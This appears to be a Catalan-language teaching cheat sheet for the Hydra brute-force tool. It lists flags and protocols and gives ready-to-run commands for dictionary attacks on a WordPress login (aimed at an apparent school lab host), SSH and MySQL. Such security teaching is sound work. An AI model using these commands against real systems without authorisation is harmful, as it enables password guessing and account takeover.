Hydra

Eina de test de penetració que realitza atacs de força bruta per provar contrasenyes en sistemes remots com serveis SSH, FTP o HTTP entre d’altres.

💡 Flags més utilitzades

-l: usuari que volem atacar
-L: llista d’usuaris que volem atacar
-p: contrasenya a utilitzar
-P: diccionari de passwords que volem utilitzar
-s: port si el servei a atacar no usa el per defecte

💡 Protocols més habituals

- SSH
- FTP
- HTTP/HTTPS
- Telnet
- SMTP
- POP3
- IMAP
- HTTP Basic Authentication
- MySQL
- PostgreSQL
- VNC
- SNMP
- RDP
- SMB
- LDAP
- RADIUS

Atac de diccionari a l’inici de sessió d’un WordPress

💡 https-form-post: les dades del formulari (nom dels inputs, nom del submit i el “F” és el missatge d’error que busca Hydra a la pàgina).

hydra -l cyberuserlab -P ./diccionari.txt cyberlab.ceceti.iesmontsia.cat -V https-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:F=The password you entered for the username'

Atac de força bruta a un SSH

hydra -l cyberuserlab -P ./diccionari.txt ssh://[IP]

Atac de força bruta a un MySQL

hydra -l usuari -P ./diccionari mysql://[IP]:[port]